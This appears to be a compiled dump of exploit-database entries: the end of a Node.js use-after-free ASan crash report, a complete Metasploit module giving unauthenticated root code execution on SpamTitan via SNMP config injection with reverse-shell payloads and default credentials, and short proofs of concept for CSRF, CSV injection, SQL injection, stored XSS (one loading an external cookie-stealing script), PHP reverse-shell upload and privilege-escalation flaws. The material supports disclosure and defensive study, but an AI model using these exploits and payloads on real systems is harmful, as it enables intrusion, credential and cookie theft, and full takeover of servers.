    #10 0x1ca81e0 in v8::internal::Builtin_HandleApiCall(int, unsigned long*, v8::internal::Isolate*) /pwd/out/../deps/v8/src/builtins/builtins-api.cc:129:1
    #11 0x3e096df in Builtins_CEntry_Return1_DontSaveFPRegs_ArgvOnStack_BuiltinExit (/p0/node/node-v14.11.0/out/Debug/node+0x3e096df)

0x608000011138 is located 24 bytes inside of 88-byte region [0x608000011120,0x608000011178)
freed by thread T0 here:
    #0 0xe79b1d in operator delete(void*) (/p0/node/node-v14.11.0/out/Debug/node+0xe79b1d)
    #1 0x1707177 in node::SimpleWriteWrap<node::AsyncWrap>::~SimpleWriteWrap() /pwd/out/../src/stream_base.h:418:7
    #2 0xf943be in node::BaseObject::decrease_refcount() /pwd/out/../src/base_object-inl.h:203:7
    #3 0x10886e6 in node::BaseObjectPtrImpl<node::AsyncWrap, false>::~BaseObjectPtrImpl() /pwd/out/../src/base_object-inl.h:248:12
    #4 0x13c2a3c in node::StreamReq::Dispose() /pwd/out/../src/stream_base-inl.h:40:1
    #5 0x16f794c in node::WriteWrap::OnDone(int) /pwd/out/../src/stream_base.cc:591:3
    #6 0x10e71f8 in node::StreamReq::Done(int, char const*) /pwd/out/../src/stream_base-inl.h:261:3
    #7 0x1921f95 in node::TLSWrap::InvokeQueued(int, char const*) /pwd/out/../src/tls_wrap.cc:101:8
    #8 0x1927f39 in node::TLSWrap::EncOut() /pwd/out/../src/tls_wrap.cc:356:5
    #9 0x192e258 in node::TLSWrap::DoWrite(node::WriteWrap*, uv_buf_t*, unsigned long, uv_stream_s*) /pwd/out/../src/tls_wrap.cc:820:3
    #10 0x13b50dd in node::StreamBase::Write(uv_buf_t*, unsigned long, uv_stream_s*, v8::Local<v8::Object>) /pwd/out/../src/stream_base-inl.h:193:9
    #11 0x16f108f in node::StreamBase::Writev(v8::FunctionCallbackInfo<v8::Value> const&) /pwd/out/../src/stream_base.cc:169:27
    #12 0x16faa47 in void node::StreamBase::JSMethod<&(node::StreamBase::Writev(v8::FunctionCallbackInfo<v8::Value> const&))>(v8::FunctionCallbackInfo<v8::Value> const&) /pwd/out/../src/stream_base.cc:468:29
    #13 0x1caf642 in v8::internal::FunctionCallbackArguments::Call(v8::internal::CallHandlerInfo) /pwd/out/../deps/v8/src/api/api-arguments-inl.h:158:3
    #14 0x1cabfaf in v8::internal::MaybeHandle<v8::internal::Object> v8::internal::(anonymous namespace)::HandleApiCallHelper<false>(v8::internal::Isolate*, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::FunctionTemplateInfo>, v8::internal::Handle<v8::internal::Object>, v8::internal::BuiltinArguments) /pwd/out/../deps/v8/src/builtins/builtins-api.cc:111:36
    #15 0x1ca8f8a in v8::internal::Builtin_Impl_HandleApiCall(v8::internal::BuiltinArguments, v8::internal::Isolate*) /pwd/out/../deps/v8/src/builtins/builtins-api.cc:141:5
    #16 0x1ca81e0 in v8::internal::Builtin_HandleApiCall(int, unsigned long*, v8::internal::Isolate*) /pwd/out/../deps/v8/src/builtins/builtins-api.cc:129:1
    #17 0x3e096df in Builtins_CEntry_Return1_DontSaveFPRegs_ArgvOnStack_BuiltinExit (/p0/node/node-v14.11.0/out/Debug/node+0x3e096df)

previously allocated by thread T0 here:
    #0 0xe792bd in operator new(unsigned long) (/p0/node/node-v14.11.0/out/Debug/node+0xe792bd)
    #1 0x16f81c2 in node::StreamBase::CreateWriteWrap(v8::Local<v8::Object>) /pwd/out/../src/stream_base.cc:629:10
    #2 0x13b4fb0 in node::StreamBase::Write(uv_buf_t*, unsigned long, uv_stream_s*, v8::Local<v8::Object>) /pwd/out/../src/stream_base-inl.h:191:25
    #3 0x16f108f in node::StreamBase::Writev(v8::FunctionCallbackInfo<v8::Value> const&) /pwd/out/../src/stream_base.cc:169:27
    #4 0x16faa47 in void node::StreamBase::JSMethod<&(node::StreamBase::Writev(v8::FunctionCallbackInfo<v8::Value> const&))>(v8::FunctionCallbackInfo<v8::Value> const&) /pwd/out/../src/stream_base.cc:468:29
    #5 0x1caf642 in v8::internal::FunctionCallbackArguments::Call(v8::internal::CallHandlerInfo) /pwd/out/../deps/v8/src/api/api-arguments-inl.h:158:3
    #6 0x1cabfaf in v8::internal::MaybeHandle<v8::internal::Object> v8::internal::(anonymous namespace)::HandleApiCallHelper<false>(v8::internal::Isolate*, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::FunctionTemplateInfo>, v8::internal::Handle<v8::internal::Object>, v8::internal::BuiltinArguments) /pwd/out/../deps/v8/src/builtins/builtins-api.cc:111:36
    #7 0x1ca8f8a in v8::internal::Builtin_Impl_HandleApiCall(v8::internal::BuiltinArguments, v8::internal::Isolate*) /pwd/out/../deps/v8/src/builtins/builtins-api.cc:141:5
    #8 0x1ca81e0 in v8::internal::Builtin_HandleApiCall(int, unsigned long*, v8::internal::Isolate*) /pwd/out/../deps/v8/src/builtins/builtins-api.cc:129:1
    #9 0x3e096df in Builtins_CEntry_Return1_DontSaveFPRegs_ArgvOnStack_BuiltinExit (/p0/node/node-v14.11.0/out/Debug/node+0x3e096df)
    #10 0x3c06181 in Builtins_InterpreterEntryTrampoline (/p0/node/node-v14.11.0/out/Debug/node+0x3c06181)
    #11 0x3c06181 in Builtins_InterpreterEntryTrampoline (/p0/node/node-v14.11.0/out/Debug/node+0x3c06181)


SUMMARY: AddressSanitizer: heap-use-after-free /usr/bin/../lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/unique_ptr.h:154:42 in std::__uniq_ptr_impl<v8::BackingStore, std::default_delete<v8::BackingStore> >::_M_ptr() const
Shadow bytes around the buggy address:
  0x0c107fffa1d0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c107fffa1e0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c107fffa1f0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c107fffa200: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
  0x0c107fffa210: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c107fffa220: fa fa fa fa fd fd fd[fd]fd fd fd fd fd fd fd fa
  0x0c107fffa230: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c107fffa240: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c107fffa250: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c107fffa260: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c107fffa270: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==1408671==ABORTING



Credits: 
Felix Wilhelm of Google Project Zero

This bug is subject to a 90 day disclosure deadline. After 90 days elapse, the bug report 
will become visible to the public. The scheduled disclosure date is 2020-12-21. 
Disclosure at an earlier date is also possible if agreed upon by all parties.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::SNMPClient
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
'Name' => 'SpamTitan Unauthenticated RCE',
'Description' => %q{
          TitanHQ SpamTitan Gateway is an anti-spam appliance that protects against
          unwanted emails and malwares. This module exploits an improper input
          sanitization in versions 7.01, 7.02, 7.03 and 7.07 to inject command directives
          into the SNMP configuration file and get remote code execution as root. Note
          that only version 7.03 needs authentication and no authentication is required
          for versions 7.01, 7.02 and 7.07.

          First, it sends an HTTP POST request to the `snmp-x.php` page with an `SNMPD`
          command directives (`extend` + command) passed to the `community` parameter.
          This payload is then added to `snmpd.conf` by the application. Finally, the
          module triggers the execution of this command by querying the SNMP server for
          the correct OID.

          This exploit module has been successfully tested against versions 7.01, 7.02,
          7.03, and 7.07.
        },
'License' => MSF_LICENSE,
'Author' =>
          [
'Christophe De La Fuente', # MSF module
'Felipe Molina' # original PoC
          ],
'References' =>
          [
            [ 'EDB', '48856' ],
            [ 'URL', 'https://www.titanhq.com/spamtitan/spamtitangateway/'],
            [ 'CVE', '2020-11698']
          ],
'CmdStagerFlavor' => %i[fetch wget curl],
'Payload' => {
'DisableNops' => true
        },
'Targets' =>
        [
          [
'Unix In-Memory',
            {
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
'Payload' => {
'BadChars' => "\\'#",
'Encoder' => 'cmd/perl',
'PrependEncoder' => '/bin/tcsh -c \'',
'AppendEncoder' => '\'#',
'Space' => 470
              },
'Type' => :unix_memory
            }
          ],
          [
'FreeBSD Dropper (x64)',
            {
'Platform' => 'bsd',
'Arch' => [ARCH_X64],
'DefaultOptions' => { 'PAYLOAD' => 'bsd/x64/shell_reverse_tcp' },
'Payload' => {
'BadChars' => "'#",
'Space' => 450
              },
'Type' => :bsd_dropper
            }
          ],
          [
'FreeBSD Dropper (x86)',
            {
'Platform' => 'bsd',
'Arch' => [ARCH_X86],
'DefaultOptions' => { 'PAYLOAD' => 'bsd/x86/shell_reverse_tcp' },
'Payload' => {
'BadChars' => "'#",
'Space' => 450
              },
'Type' => :bsd_dropper
            }
          ]
        ],
'DisclosureDate' => '2020-04-17',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [CONFIG_CHANGES, ARTIFACTS_ON_DISK]
        }
      )
    )
    register_options(
      [
        Opt::RPORT(80, true, 'The target HTTP port'),
        OptPort.new('SNMPPORT', [ true, 'The target SNMP port (UDP)', 161 ]),
        OptString.new('TARGETURI', [ true, 'The base path to SpamTitan', '/' ]),
        OptString.new(
'USERNAME',
          [
            false,
'Username to authenticate, if required (depending on SpamTitan Gateway version)',
'admin'
          ]
        ),
        OptString.new(
'PASSWORD',
          [
            false,
'Password to authenticate, if required (depending on SpamTitan Gateway version)',
'hiadmin'
          ]
        ),
        OptString.new(
'COMMUNITY',
          [
            false,
'The SNMP Community String to use (random string by default)',
            Rex::Text.rand_text_alpha(8)
          ]
        ),
        OptString.new(
'ALLOWEDIP',
          [
            false,
'The IP address that will be allowed to query the injected `extend` '\
'command. This IP will be added to the SNMP configuration file on the '\
'target. This is tipically this host IP address, but can be different if '\
'your are in a NAT\'ed network. If not set, `LHOST` will be used '\
'instead. If `LHOST` is not set, it will default to `127.0.0.1`.'
          ]
        ),
      ], self.class
    )
  end

  def check
    snmp_x_uri = normalize_uri(target_uri.path, 'snmp-x.php')
    vprint_status("Check if #{snmp_x_uri} exists")
    res = send_request_cgi(
'uri' => snmp_x_uri,
'method' => 'GET'
    )

    if res.nil?
      return Exploit::CheckCode::Unknown.new(
"Could not connect to SpamTitan vulnerable page (#{snmp_x_uri}) - no response"
      )
    end

    if res.code == 302
      vprint_status(
'This version of SpamTitan requires authentication. Trying with the '\
'provided credentials.'
      )
      res = send_request_cgi(
'uri' => '/index.php',
'method' => 'POST',
'vars_post' => {
'jaction' => 'none',
'language' => 'en_US',
'address' => datastore['USERNAME'],
'passwd' => datastore['PASSWORD']
        }
      )
      if res.nil?
        return Exploit::CheckCode::Safe.new('Unable to authenticate - no response')
      end

      if res.code == 200 && res.body =~ /Invalid username or password/
        return Exploit::CheckCode::Safe.new(
'Unable to authenticate - Invalid username or password'
        )
      end
      unless res.code == 302
        return Exploit::CheckCode::Unknown.new(
"Unable to authenticate - Unexpected HTTP response code: #{res.code}"
        )
      end

      # For whatever reason, the web application sometimes returns multiple
      # PHPSESSID cookies and only the last one is valid. So, make sure only
      # the valid one is part of the cookie_jar.
      cookies = res.get_cookies.split('')
      php_session = cookies.select { |cookie| cookie.starts_with?('PHPSESSID=') }.last
      cookie_jar.clear
      cookie_jar.add(php_session)
      remaining_cookies = cookies.delete_if { |cookie| cookie.starts_with?('PHPSESSID=') }
      cookie_jar.merge(remaining_cookies)

      res = send_request_cgi(
'uri' => snmp_x_uri,
'method' => 'GET'
      )
    end

    unless res.code == 200
      return Exploit::CheckCode::Safe.new(
"Could not connect to SpamTitan vulnerable page (#{snmp_x_uri}) - "\
"unexpected HTTP response code: #{res.code}"
      )
    end

    Exploit::CheckCode::Appears
  rescue ::Rex::ConnectionError => e
    vprint_error("Connection error: #{e}")
    return Exploit::CheckCode::Unknown.new(
"Could not connect to SpamTitan vulnerable page (#{snmp_x_uri})"
    )
  end

  def exploit
    if target['Type'] == :unix_memory
      execute_command(payload.encoded)
    else
      execute_cmdstager(linemax: payload_info['Space'].to_i, noconcat: true)
    end
  rescue ::Rex::ConnectionError
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
  end

  def inject_payload(community)
    snmp_x_uri = normalize_uri(target_uri.path, 'snmp-x.php')
    print_status("Send a request to #{snmp_x_uri} and inject the payload")

    post_params = {
'jaction' => 'saveAll',
'contact' => 'CONTACT',
'name' => 'SpamTitan',
'location' => 'LOCATION',
'community' => community
    }

    # First, grab the CSRF token, if any (depending on the version)
    res = send_request_cgi(
'uri' => '/snmp.php',
'method' => 'GET'
    )
    if res.code == 200
      doc = ::Nokogiri::HTML(res.body)
      csrf_name = doc.xpath('//input[@name=\'CSRFName\']/attribute::value').first&.value
      csrf_token = doc.xpath('//input[@name=\'CSRFToken\']/attribute::value').first&.value
      if csrf_name && csrf_token
        print_status('CSRF token found')
        post_params['CSRFName'] = csrf_name
        post_params['CSRFToken'] = csrf_token
      end
    end

    res = send_request_cgi(
'uri' => snmp_x_uri,
'method' => 'POST',
'vars_post' => post_params
    )
    if res.nil?
      fail_with(Failure::Unreachable,
"#{peer} - Unable to inject the payload - no response")
    end
    unless res.code == 200
      fail_with(Failure::UnexpectedReply,
"#{peer} - Unable to inject the payload - unexpected HTTP response "\
"code: #{res.code}")
    end
    begin
      json_res = JSON.parse(res.body)['success']
    rescue JSON::ParserError
      json_res = nil
    end
    unless json_res
      fail_with(Failure::UnexpectedReply,
"#{peer} - Unable to inject the payload - Unknown error: #{res.body}")
    end
  end

  def trigger_payload(name)
    print_status('Send an SNMP Get-Request to trigger the payload')

    # RPORT needs to be specified since the default value is set to the web
    # service port.
    connect_snmp(true, 'RPORT' => datastore['SNMPPORT'])
    begin
      res = snmp.get("1.3.6.1.4.1.8072.1.3.2.3.1.1.8.#{name.bytes.join('.')}")
      msg = "SNMP Get-Request response (status=#{res.error_status}): "\
"#{res.each_varbind.map(&:value).join('|')}"
      if res.error_status == :noError
        vprint_good(msg)
      else
        vprint_error(msg)
      end
    rescue SNMP::RequestTimeout, IOError
      # not always expecting a response here, so timeout is likely to happen
    end
  end

  def execute_command(cmd, _opts = {})
    if target['Type'] == :bsd_dropper
      # 'tcsh' is the default shell on FreeBSD
      # Also, make sure it runs in background (&) to avoid blocking
      cmd = "/bin/tcsh -c '#{[cmd.gsub('\'', '\\\\\'').gsub('\\', '\\\\\\')].shelljoin}&'#"
    end
    name = Rex::Text.rand_text_alpha(8)
    ip = datastore['ALLOWEDIP'] || datastore['LHOST'] || '127.0.0.1'
    if ip == '127.0.0.1'
      print_warning(
'Neither ALLOWEDIP and LHOST has been set and 127.0.0.1 will be used'\
'instead. It will probably fail to trigger the payload.'
      )
    end

    # The injected payload consists of two lines:
    # 1. the community string and the IP address allowed to query this
    #    community string
    # 2. the `extend` keyword, the name token used to trigger the payload
    #    and the actual command to execute
    community = "#{datastore['COMMUNITY']}\" #{ip}\nextend #{name} #{cmd}"
    inject_payload(community)

    # The previous HTTP POST request made the application restart the SNMPD
    # service. So, wait a bit to make sure it is running.
    sleep(2)

    trigger_payload(name)
  end
end

# Exploit Title: Advanced Webhost Billing System 3.7.0 - Cross-Site Request Forgery (CSRF)
# Date: 06/01/2021
# Exploit Author: Rahul Ramakant Singh
# Vendor Homepage: https://www.awbs.com/
# Version: 3.7.0
# Tested on Windows

Steps:

1. Login into the application with the help of email and password.
2. Navigate to my additional contact page and add one contact for the same
3. Now there is option for delete the contact from the list.
4. Now Logout from the application and same create a one CSRF POC having having action of delete contact and same blank the token value from CSRF POC.
5. Now again login into the application and Send a link of this crafted page(generated CSRF POC) to the victim.
6. When the victim user opens the link, a script present on the crafted page sends a request for delete of contact to the server with an active session ID of the victim and accept the blank token value from the request.
7. Contact successfully deleted.

# Exploit Title: dirsearch 0.4.1 - CSV Injection
# Author: Dolev Farhi
# Date: 2021-01-05
# Vendor Homepage: https://github.com/maurosoria/dirsearch
# Version : 0.4.1
# Tested on: Debian 9.13

dirsearch, when used with the --csv-report flag, writes the results of crawled endpoints which redirect(, to a csv file without sanitization.
A malicious server can redirect all of its routes/paths to a path that contains a comma and formula, e.g. /test,=1336+1, and escape the normal dirsearch CSV structure to inject its own formula.

Malicious Flask Webserver:

"""
from flask import Flask, redirect
app = Flask(__name__)

@app.route('/')
def index():
 return redirect('/test,=1336+1')

@app.route('/admin')
def admin():
 return redirect('/test,=1336+1')

@app.route('/login')
def login():
 return redirect('/test,=1336+1')
"""


2. Tester runs dirsearch
root@host:~/# python3 dirsearch.py -u http://10.0.0.1 --csv-report=report.csv 


  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, html, htm, js | HTTP method: GET | Threads: 30 | Wordlist size: 2

Error Log: /root/tools/dirsearch/logs/errors-21-01-06_04-29-10.log

Target: http://10.0.0.1

Output File: /root/tools/dirsearch/reports/10.0.0.1/_21-01-06_04-29-10.txt

[04:29:10] Starting: 
[04:29:11] 302 -  233B  - /admin  ->  http://10.0.0.1/test,=1336+1
[04:29:11] 302 -  233B  - /login  ->  http://10.0.0.1/test,=1336+1


3. Result CSV

root@host:~/# cat report.csv

Time,URL,Status,Size,Redirection
Wed Jan  6 04:29:11 2021,http://10.0.0.1:80/admin,302,233,http://10.0.0.1/test,=1336+1
Wed Jan  6 04:29:11 2021,http://10.0.0.1:80/login,302,233,http://10.0.0.1/test,=1336+1

# Exploit Title: IObit Uninstaller 10 Pro - Unquoted Service Path
# Date: 2020–12–24
# Exploit Author: Mayur Parmar(th3cyb3rc0p)
# Vendor Homepage: https://www.iobit.com
# Software Link: https://www.iobit.com/en/advanceduninstaller.php
# Version: 10
# Tested on Windows 10

Unquoted Service Path:
When a service is created whose executable path contains spaces and isn’t enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges (only if the vulnerable service is running with SYSTEM privilege level which most of the time it is).
In Windows, if the service is not enclosed within quotes and is having spaces, it would handle the space as a break and pass the rest of the service path as an argument.

Attack Vector:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

Steps to reproduce:

C:\Windows\system32>sc qc IObitUnSvr
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: IObitUnSvr
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : IObit Uninstaller Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

Mitigation:Ensure that any services that contain a space in the path enclose the path in quotes.

Reference:
-> https://www.rapid7.com/db/modules/exploit/windows/local/unquoted_service_path/
-> https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae
-> https://www.hackingarticles.in/windows-privilege-escalation-unquoted-path-service/
-> https://sec-consult.com/blog/detail/windows-privilege-escalation-an-approach-for-penetration-testers/

# Exploit Title: IPeakCMS 3.5 - Boolean-based blind SQLi
# Date: 07.12.2020
# Exploit Author: MoeAlbarbari
# Vendor Homepage: https://ipeak.ch/
# Software Link: N/A
# Version: 3.5
# Tested on: BackBox Linux
# CVE : CVE-2021-3018

Check the CMS version :goto www.site.com/cms/ and you will notice that in the login box there is the CMS name and its version 
Check if it's vulnerable, goto ->: site.com/cms/print.php if the print.php exists, then try to find any valid ID which returns page to print  e.g: site.com/cms/print.php?id=1
Parameter: id (GET based)
Use SQLmap if you've found the valid id...
e.g: sqlmap -u "site.com/cms/print.php?id=1" --dbs
Payload : id=(SELECT (CASE WHEN(3104=3104) THEN 1 ELSE (SELECT 8458) END))

# Exploit Title: Expense Tracker 1.0 - 'Expense Name' Stored Cross-Site Scripting
# Exploit Author: Shivam Verma(cyb3r_n3rd)
# Date: 2021-01-05
# Vendor Homepage: https://code-projects.org/expense-tracker-in-php-with-source-code/
# Software Link: https://code-projects.org
# Version: 1.0
# Category: Web Application
# Tested on: Kali Linux
# Contact: https://www.linkedin.com/in/shivam413

Attack Vector: This Vulnerability Leads an Attacker to Inject Malicious Payloads in Expense Category section and Paste the Payload in the Desired field each time admin/user visits and manages the user data, The Malicious Payload(XSS) triggers and attacker can capture the admin cookies and access the users Data in Plain Text

Step 1. Install The Software
Step 2. Click on Add Expense Category
Step 3. Now paste your Xss Payload in the Parameter(Expense Name)
Step 4. Click on Add
Step 5. Wait for the Administrator to click on Your link
Step 6. You will receive Admin Cookie Every time he Process the Request

---

XSS Payload: "><script src=https://.xss.ht></script>

# Exploit Title: WordPress Plugin WP24 Domain Check 1.6.2 - 'fieldnameDomain' Stored Cross Site Scripting
# Date: 2021-01-03
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
# Vendor Homepage: https://wordpress.org/plugins/wp24-domain-check/
# Software Link: https://wordpress.org/plugins/wp24-domain-check/
# Version: 1.6.2
# Tested on: Apache2 - Windows 10

Vulnerable param: wp24_domaincheck[fieldnameDomain]
-------------------------------------------------------------------------
POST /w12ee3/wp-admin/options.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/w12ee3/wp-admin/options-general.php?page=wp24_domaincheck_settings&tab=advanced
Content-Type: application/x-www-form-urlencoded
Content-Length: 415
Origin: http://localhost
Connection: close
Cookie: wordpress_a25e758b4b8611d32cffab04f654ade8=admin%7C1610108483%7C9JXQJh8k8MPmNowV0sLR7zP5q0hyjw2rpi8fp0wdZNa%7C9bd3e4806dbb6058ca887771af1d82b5d04ad6c3d14f8f6f88d9604ad12ae500; wordpress_logged_in_a25e758b4b8611d32cffab04f654ade8=admin%7C1610108483%7C9JXQJh8k8MPmNowV0sLR7zP5q0hyjw2rpi8fp0wdZNa%7C8edadaf3ba084ba1d6cb6257a460f043efde74e8bcd9817826faf9ad80271d1e; wp-settings-time-1=1609659595; bp_user-role=administrator; bp_user-registered=1608898152000; bp_ut_session=%7B-q-pageviews-q-%3A1-c--q-referrer-q-%3A-q--q--c--q-landingPage-q-%3A-q-http%3A%2F%2Flocalhost%2Fw12ee3%2F-q--c--q-started-q-%3A1609657029216%7D
Upgrade-Insecure-Requests: 1

update_advanced_settings=1&option_page=wp24_domaincheck&action=update&_wpnonce=8dcf91df50&_wp_http_referer=/w12ee3/wp-admin/options-general.php?page=wp24_domaincheck_settings&tab=advanced&wp24_domaincheck%5BhtmlForm%5D=1&wp24_domaincheck[fieldnameDomain]=111%22+onfocus%3Dalert%28document.cookie%29%3B+on%3D&wp24_domaincheck%5BfieldnameTld%5D=domaincheck_tld&submit=De%C4%9Fi%C5%9Fiklikleri+kaydet

Source Code:

\wp-content\plugins\wp24-domain-check\includes\class-wp24-settings.php:
--------------------------------------------------------------------
                // fieldnameDomain
                                add_settings_field(
'fieldnameDomain',
                                                __( 'Domain fieldname', 'wp24-domaincheck' ),
                                                array( $this, 'inputfield' ),
'settings_advanced',
'section_advanced_form',
                                                array(
'name' => 'fieldnameDomain',
'type' => 'textfield',
                                                )
                                );
Vulnerable: 'name' => 'fieldnameDomain'

-------------------------------------------------------------------------

Payload:
111" onfocus=alert(document.cookie); on=
-------------------------------------------------------------------------

# Exploit Title: Responsive E-Learning System 1.0 - Unrestricted File Upload to RCE
# Date: 2020-12-24
# Exploit Author: Kshitiz Raj (manitorpotterk)
# Vendor Homepage: https://www.sourcecodester.com/php/5172/responsive-e-learning-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=5172&title=Responsive+E-Learning+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Windows 10/Kali Linux

Step 1 -  Login to the application with admin credentials.
Step 2 - Click on Student or go to http://localhost/elearning/admin/student.php
Step 3 - Click on Add Student and fill the required things.
Step 4 - In image upload any php reverse shell.
Step 5 - Visit "http://localhost/elearning/admin/uploads/" and select your uploaded PHP web shell.

# Exploit Title: Responsive E-Learning System 1.0 – Stored Cross Site Scripting
# Date: 2020-12-24
# Exploit Author: Kshitiz Raj(manitorpotterk)
# Vendor Homepage: https://www.sourcecodester.com/php/5172/responsive-e-learning-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=5172&title=Responsive+E-Learning+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Windows 10/Kali Linux

Step 1- Go to url http://localhost/elearning/admin/index.php
Step 2 – Login as admin.
Step 3 – Go to http://localhost/elearning/admin/course.php
Step 4 – click on Edit course (any course)
Step 5 – Enter *Course Year And Section:*  as <script>alert()</script> and fill the other values.
Step 6 – Click Save

XSS popup will be triggered.

# Exploit Title: WordPress Plugin litespeed-cache 3.6 - 'server_ip' Cross-Site Scripting
# Date: 20-12-2020
# Software Link: https://downloads.wordpress.org/plugin/litespeed-cache.3.6.zip
# Version: litespeed-cache
# Tested on: Windows 10 x64

# Description:
# A Stored Cross-site scripting (XSS) was discovered in wordpress plugins litespeed-cache 3.6
# One parameters(server_ip) have Cross-Site Scripting.

POST /wp-admin/admin.php?page=litespeed-general HTTP/1.1
Host: localhost
Content-Length: 374
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/wp-admin/admin.php?page=litespeed-general
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie:
wordpress_a5beef43d228c89cc1d954ec4fcadda1=admin%7C1609289111%7CM6c2pV6VbnD2OElpSET6Aw3GhKFJBGdgetyfHtqxJkC%7C27d97999284897d8645200c65a7f508dffef6a9184800b2905627ccbd4d71806;
wordpress_test_cookie=WP%20Cookie%20check;
_lscache_vary=9effc614452472ce40565e73d3f4301c;
wordpress_logged_in_a5beef43d228c89cc1d954ec4fcadda1=admin%7C1609289111%7CM6c2pV6VbnD2OElpSET6Aw3GhKFJBGdgetyfHtqxJkC%7Cd7e1a2a77822d410d7ebe2540b88dc68f908a031ceda6e884995ff419bfb6b38;
wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1609116311
Connection: close

LSCWP_CTRL=save-settings&LSCWP_NONCE=af21ea74b2&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dlitespeed-general&_settings-enroll%5B%5D=auto_upgrade&auto_upgrade=0&_settings-enroll%5B%5D=api_key&api_key=&_settings-enroll%5B%5D=server_ip&server_ip=%3Cscript%3Ealert%28%27Hoa%27%29%3C%2Fscript%3E&_settings-enroll%5B%5D=news&news=1&litespeed-submit=Save+Changes

# Exploit Title: Newgen Correspondence Management System (corms) eGov 12.0 - IDOR
# Date: 29 Dec 2020
# Exploit Author: ALI AL SINAN
# Vendor Homepage: https://newgensoft.com
# Software Link: https://newgensoft.com/solutions/industries/government/e-gov-office/
# Version: eGov 12.0
# Tested on: JBoss EAP 7
# CVE : CVE-2020-35737
-----------------------------------------------------

Description:

Correspondence management is the process of handling official incoming and outgoing correspondence in government agencies. The word “correspondence” in this context refers to physical letters, direct e-delivery, emails and faxes along with all their attachments that are received by the government agencies.

-----------------------------------------------------

Vulnerability:

Affected URL:
http://server/corms/dist/#/web/home/workdesk/inbox

Vulnerability Description:
user can manipulate parameter “UserIndex” in personal setting page. this parameter can allow un-authorized access to view or change other user's personal information.

# Exploit Title: WinAVR Version 20100110 - Insecure Folder Permissions
# Date: 2020-12-11
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: https://sourceforge.net/projects/winavr/
# Software Link: https://sourceforge.net/projects/winavr/files/WinAVR/20100110/WinAVR-20100110-install.exe
# Version: Version 20100110
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763

# Info:

PS C:\WinAVR-20100110\bin> icacls.exe .
. BUILTIN\Administrators:(I)(OI)(CI)(F)
  NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
